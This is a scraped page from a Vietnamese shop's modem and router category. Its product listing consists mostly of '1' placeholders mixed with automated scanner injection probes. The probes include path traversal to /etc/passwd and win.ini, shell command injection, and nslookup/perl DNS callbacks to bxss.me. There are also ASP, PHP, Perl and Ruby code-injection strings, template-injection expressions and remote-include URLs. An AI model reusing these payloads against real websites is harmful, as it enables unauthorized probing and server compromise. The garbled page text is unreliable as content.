TRANG CHỦ HƯỚNG DẪN SỬ DỤNG DOWNLOAD DỊCH VỤ CHÉP PHIM HD DỊCH VỤ HỖ TRỢ CHUYỄN SANG PHIÊN BẢN WEBSITE MỚI
English
 
SẢN PHẨM » Modem ADSL - 3G - Router Wifi
DANH MỤC SẢN PHẨM
 
TÌM KIẾM NÂNG CAO
 
 
 
 
HỖ TRỢ TRỰC TUYẾN
 
Hỗ Trợ Mua Hàng
 
 
Hỗ Trợ Website
 
 
1
 
 
1
  Sky: dwUQQUrL
 
1
 
 
1
 
 
1
 
 
1
 
 
1DptY634FxO
 
 
1
 
 
1
 
 
1
  Sky: dwUQQUrL
 
1
 
 
1
  Sky: dwUQQUrL
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
response.write(9904615*9005641)
 
 
'+response.write(9904615*9005641)+'
 
 
"+response.write(9904615*9005641)+"
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
KNBmoY9f
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
  ">&m=g&t=1" border="0" />
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
 
 
1
 
 
12345'"\'\");|]*{ <>
 
 
1
 
 
1
 
 
 
 
1
 
 
1
 
 
1
 
 
../../../../../../../../../../etc/passwd
 
 
1
 
 
1
  ">&m=g&t=1" border="0" />
 
1
 
 
1
 
 
../../../../../../../../../../windows/win.ini
 
 
1
 
 
1
 
 
1
 
 
../1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
${9999687+9999080}
 
 
1
 
 
1
 
 
echo bksuex$()\ xetnfk\nz^xyu||a #' &echo bksuex$()\ xetnfk\nz^xyu||a #|" &echo bksuex$()\ xetnfk\nz^xyu||a #
 
 
&echo fjfexx$()\ fdshlk\nz^xyu||a #' &echo fjfexx$()\ fdshlk\nz^xyu||a #|" &echo fjfexx$()\ fdshlk\nz^xyu||a #
 
 
|echo qwmsqe$()\ yytqmm\nz^xyu||a #' |echo qwmsqe$()\ yytqmm\nz^xyu||a #|" |echo qwmsqe$()\ yytqmm\nz^xyu||a #
 
 
(nslookup hitgttodzoamee115a.bxss.me||perl -e "gethostbyname('hitgttodzoamee115a.bxss.me')")
 
 
$(nslookup hiteznwjzepwf0b9a7.bxss.me||perl -e "gethostbyname('hiteznwjzepwf0b9a7.bxss.me')")
 
 
1
 
 
&(nslookup hitaqxqlssmoz7a4b7.bxss.me||perl -e "gethostbyname('hitaqxqlssmoz7a4b7.bxss.me')")&'\"`0&(nslookup hitaqxqlssmoz7a4b7.bxss.me||perl -e "gethostbyname('hitaqxqlssmoz7a4b7.bxss.me')")&`'
 
 
1
 
 
|(nslookup hitazafboadgb7dd3e.bxss.me||perl -e "gethostbyname('hitazafboadgb7dd3e.bxss.me')")
 
 
1
 
 
1
 
 
1
 
 
`(nslookup hitjfoxzeztql2a720.bxss.me||perl -e "gethostbyname('hitjfoxzeztql2a720.bxss.me')")`
 
 
1
 
 
1
 
 
;(nslookup hitzjzkpbkzvo252a3.bxss.me||perl -e "gethostbyname('hitzjzkpbkzvo252a3.bxss.me')")|(nslookup hitzjzkpbkzvo252a3.bxss.me||perl -e "gethostbyname('hitzjzkpbkzvo252a3.bxss.me')")&(nslookup hitzjzkpbkzvo252a3.bxss.me||perl -e "gethostbyname('h
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1&n998222=v905128
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
)
 
 
1
 
 
!(()&&!|*|*|
 
 
1
 
 
1
 
 
^(#$!@#$)(()))******
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
 
 
1
 
 
'"()
 
 
1
 
 
1
 
 
1
 
 
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
 
 
1
 
 
1some_inexistent_file_with_long_name.jpg
 
 
Http://bxss.me/t/fit.txt
 
 
'.gethostbyname(lc('hitkf'.'czzoajwi46e18.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(76).chr(122).chr(90).'
 
 
http://bxss.me/t/fit.txt?.jpg
 
 
".gethostbyname(lc("hital"."ewjtajyu73af1.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(66).chr(97).chr(79)."
 
 
bxss.me
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
HttP://bxss.me/t/xss.html?%00
 
 
1
 
 
1
 
 
bxss.me/t/xss.html?%00
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
"+"A".concat(70-3).concat(22*4).concat(120).concat(90).concat(116).concat(75)+(require"socket" Socket.gethostbyname("hithr"+"agxdstgf7f8ff.bxss.me.")[3].to_s)+"
 
 
1
 
 
1
 
 
1
 
 
'+'A'.concat(70-3).concat(22*4).concat(100).concat(76).concat(114).concat(68)+(require'socket' Socket.gethostbyname('hitil'+'xffowyyef7d62.bxss.me.')[3].to_s)+'
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
index.php
 
 
/xfs.bxss.me
 
 
1
 
 
1
 
 
index.php
 
 
1
 
 
index.php/.
 
 
1
 
 
1
 
 
1
 
 
;print(md5(31337));
 
 
1
 
 
1
 
 
';print(md5(31337));$a='
 
 
1
 
 
";print(md5(31337));$a="
 
 
${@print(md5(31337))}
 
 
'"
 
 
${@print(md5(31337))}\
 
 
 

 
   HƯỚNG DẪN SỬ DỤNG   |   DOWNLOAD   |   DỊCH VỤ CHÉP PHIM HD   |   DỊCH VỤ HỖ TRỢ   
 
Lượt truy cập 783418  
Số người online 12